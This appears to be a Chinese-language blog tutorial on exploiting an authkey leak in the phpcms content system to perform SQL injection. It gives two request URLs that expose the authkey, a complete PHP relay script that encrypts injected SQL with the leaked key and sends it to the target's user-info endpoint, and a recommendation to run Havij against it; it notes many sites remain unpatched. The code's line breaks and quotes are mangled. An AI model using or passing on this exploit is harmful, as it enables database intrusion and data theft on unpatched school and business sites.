phpcms_authkey泄露注入

如題，今天給大家演示一下phpcms的authkey泄露注入，phpcms企業和學校用的還是比較多

需要注意安全阿！

這裡有兩個爆出authkey的方式！

第一種:

/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=......phpsso_servercachescaches_admincaches_dataapplist&path=adminn

頁面回顯如下

第二種:

/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5Vn

關於以上兩者，如果第二個不行就用第一個！

接下來用過從獨自等待博客下載的中轉腳本

<?phpnset_time_limit(0);n$wang_url = 網址;n n$auth_key = 爆出了的authkey;n n$str = "uid=1".stripslashes($_GET[id]);n$encode = sys_auth($str, ENCODE, $auth_key);n$content = file_get_contents($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);necho $content;nfunction sys_auth($string, $operation = ENCODE, $key = , $expiry = 0) {n $key_length = 4;n $key = md5($key);n $fixedkey = hash(md5, $key);n $egiskeys = md5(substr($fixedkey, 16, 16));n $runtokey = $key_length ? ($operation == ENCODE ? substr(hash(md5, microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ;n $keys = hash(md5, substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));n $string = $operation == ENCODE ? sprintf(%010d, $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));n $i = 0; $result = ;n $string_length = strlen($string);n for ($i = 0; $i < $string_length; $i++){n $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));n }n if($operation == ENCODE) {n return $runtokey . str_replace(=, , base64_encode($result));n } else {n if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {n return substr($result, 26);n } else {n return ;n }n }n}n?>n

那麼我們把內容填好之後這裡推薦使用胡蘿蔔也就是Havij注入，因為使用sqlmap非常慢1

如下我們就成功注入了！！！

雖然漏洞出現已經有很長時間了，但還是很多站點沒有修復！希望大家多多注意及時打補丁，不要因小失大！

推薦閱讀：